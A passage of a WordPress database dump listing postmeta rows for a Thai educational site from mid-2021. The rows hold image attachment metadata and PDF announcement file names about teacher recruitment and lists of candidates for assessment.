(29088, 11896, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/1-6.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-6-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-6-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-6-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-6-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29089, 11897, '_wp_attached_file', '2021/06/2-4.png'),
(29090, 11897, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/2-4.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-4-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-4-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-4-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-4-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29091, 11898, '_wp_attached_file', '2021/06/3-2.png'),
(29092, 11898, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/3-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"3-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"3-2-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"3-2-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"3-2-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"3-2-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29093, 11901, '_edit_lock', '1625041466:14'),
(29094, 11901, '_edit_last', '14'),
(29095, 11902, '_wp_attached_file', '2021/06/300664.png'),
(29096, 11902, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:18:\"2021/06/300664.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"300664-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"300664-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"300664-768x498.png\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"300664-1024x664.png\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"300664-400x259.png\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29097, 11901, '_thumbnail_id', '11902'),
(29100, 11901, '_hide_featured', NULL),
(29103, 11904, '_edit_lock', '1625041674:14'),
(29104, 11904, '_edit_last', '14'),
(29105, 11905, '_wp_attached_file', '2021/06/300664-01.png'),
(29106, 11905, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/300664-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"300664-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"300664-01-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"300664-01-768x498.png\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"300664-01-1024x664.png\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"300664-01-400x259.png\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29107, 11904, '_thumbnail_id', '11905'),
(29110, 11904, '_hide_featured', NULL),
(29113, 11907, '_wp_attached_file', '2021/07/1.png'),
(29114, 11907, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2021/07/1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"1-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29115, 11908, '_wp_attached_file', '2021/07/2.png'),
(29116, 11908, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2021/07/2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"2-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29117, 11910, '_wp_attached_file', '2021/07/1.jpg'),
(29118, 11910, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2021/07/1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29119, 11911, '_wp_attached_file', '2021/07/2-1.png'),
(29120, 11911, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/07/2-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-1-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-1-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-1-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-1-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29123, 11914, '_wp_attached_file', '2021/07/รายชื่อผู้มีสิทธิ์เข้ารับการประเมิน.pdf'),
(29133, 11917, '_wp_attached_file', '2021/07/ประกาศรายชื่อโลจิสติกส์.pdf'),
(29139, 11919, '_wp_attached_file', '2019/12/1625313320740.png'),
(29140, 11919, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:5100;s:6:\"height\";i:2700;s:4:\"file\";s:25:\"2019/12/1625313320740.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"1625313320740-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"1625313320740-300x159.png\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"1625313320740-768x407.png\";s:5:\"width\";i:768;s:6:\"height\";i:407;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"1625313320740-1024x542.png\";s:5:\"width\";i:1024;s:6:\"height\";i:542;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"1625313320740-400x212.png\";s:5:\"width\";i:400;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29164, 11925, '_edit_lock', '1625450693:14'),
(29165, 11925, '_edit_last', '14'),
(29166, 11925, '_thumbnail_id', '11919'),
(29169, 11925, '_hide_featured', NULL),
(29179, 11927, '_edit_lock', '1625453328:14'),
(29180, 11928, '_wp_attached_file', '2021/07/050764-ประกาศรายชื่อผู้มีสิทธิเข้ารับการประเมิ.pdf'),
(29181, 11927, '_edit_last', '14'),
(29184, 11927, '_hide_featured', NULL),
(29194, 11931, '_edit_lock', '1625476308:14'),
(29195, 11931, '_edit_last', '14'),
(29196, 11931, '_hide_featured', NULL),
(29197, 11933, '_wp_attached_file', '2021/07/รายชื่อผู้มีสิทธิประเมิน-ครั้งที่-2.pdf'),
(29204, 11935, '_wp_attached_file', '2021/07/1-1.png'),
(29205, 11935, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/07/1-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-1-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-1-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-1-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-1-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29206, 11937, '_wp_attached_file', '2021/07/1-2.png'),
(29207, 11937, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/07/1-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-2-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-2-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-2-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-2-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29208, 11939, '_edit_lock', '1625563823:14'),
(29209, 11939, '_edit_last', '14'),
(29210, 11940, '_wp_attached_file', '2021/07/ประกาศโลจิสติกส์.pdf'),
(29213, 11939, '_hide_featured', NULL),
(29220, 11943, '_wp_attached_file', '2021/07/ครูจีนครูE.pdf'),
(29233, 11947, '_wp_attached_file', '2021/07/090764ประกาศรับสมัคร.pdf'),
(29252, 11949, '_edit_lock', '1626251577:14'),
(29253, 11949, '_edit_last', '14'),
(29254, 11950, '_wp_attached_file', '2021/07/090764ครูEครูจีน.pdf'),
(29257, 11949, '_hide_featured', NULL),
(29268, 11952, '_edit_lock', '1626070652:14'),
(29269, 11952, '_edit_last', '14'),
(29271, 11954, '_wp_attached_file', '2021/07/090764ประกาศรับสมัคร-1.pdf'),
(29274, 11952, '_hide_featured', NULL),
(29293, 11960, '_wp_attached_file', '2021/07/ดาวน์โหลด.png'),
(29294, 11960, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:39:\"2021/07/ดาวน์โหลด.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"ดาวน์โหลด-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29307, 11964, '_edit_lock', '1626339083:14'),
(29308, 11965, '_wp_attached_file', '2021/07/ประกาศรายชื่อครูจีน.pdf'),
(29309, 11964, '_edit_last', '14'),
(29312, 11964, '_hide_featured', NULL),
(29324, 11970, '_edit_lock', '1626674387:14'),
(29325, 11971, '_wp_attached_file', '2021/07/190764สอบผ่านครูจีน.pdf'),
(29326, 11970, '_edit_last', '14'),
(29329, 11970, '_hide_featured', NULL),
(29340, 11973, '_edit_lock', '1626682515:14'),
(29341, 11973, '_edit_last', '14'),
(29342, 11974, '_wp_attached_file', '2021/07/190764ประกาศรายชื่อ-2.pdf'),
(29345, 11973, '_hide_featured', NULL),
(29352, 11976, '_edit_lock', '1626856975:14'),
(29353, 11976, '_edit_last', '14'),
(29354, 11977, '_wp_attached_file', '2021/07/รับสมัครครูสอนภาษาอังกฤษ.pdf'),
(29357, 11976, '_hide_featured', NULL),
(29374, 11979, '_edit_lock', '1627022844:14'),
(29375, 11979, '_edit_last', '14'),
(29376, 11980, '_wp_attached_file', '2021/07/ประกาศรายชื่อสอบครูพิเศษสอน-ชย.ลจ.pdf'),
(29377, 11981, '_wp_attached_file', '2021/07/รับสมัครครูปิโตรเคมี.pdf'),
(29380, 11979, '_hide_featured', NULL),
(29395, 11984, '_edit_lock', '1627031350:14'),
(29396, 11984, '_edit_last', '14'),
(29397, 11985, '_wp_attached_file', '2021/07/ประกาศรายชื่อผู้ผ่านการเลือกสรร.pdf'),
(29400, 11984, '_hide_featured', NULL),
(29409, 11987, '_wp_attached_file', '2021/07/รายชื่อผู้ผ่านการเลือกสรร.pdf'),
(29419, 11992, '_wp_attached_file', '2021/07/messageImage_1625734682512.jpeg'),
(29420, 11992, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:830;s:6:\"height\";i:593;s:4:\"file\";s:39:\"2021/07/messageImage_1625734682512.jpeg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"messageImage_1625734682512-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"messageImage_1625734682512-300x214.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"messageImage_1625734682512-768x549.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:549;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:39:\"messageImage_1625734682512-400x286.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29421, 11993, '_wp_attached_file', '2021/07/28กค64.jpg'),
(29422, 11993, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:830;s:6:\"height\";i:593;s:4:\"file\";s:22:\"2021/07/28กค64.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"28กค64-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"28กค64-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"28กค64-768x549.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:549;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"28กค64-400x286.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29429, 11996, '_edit_lock', '1628481139:14'),
(29430, 11996, '_edit_last', '14'),
(29431, 11997, '_wp_attached_file', '2021/08/ประกาศรายชื่อครูพิเศษสอนปิโตรเคมี64.pdf'),
(29434, 11996, '_hide_featured', NULL),
(29443, 12000, '_wp_attached_file', '2021/07/koshvl6f.jpg'),
(29444, 12000, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1250;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2021/07/koshvl6f.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"koshvl6f-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"koshvl6f-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"koshvl6f-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"koshvl6f-1024x410.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"koshvl6f-400x160.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s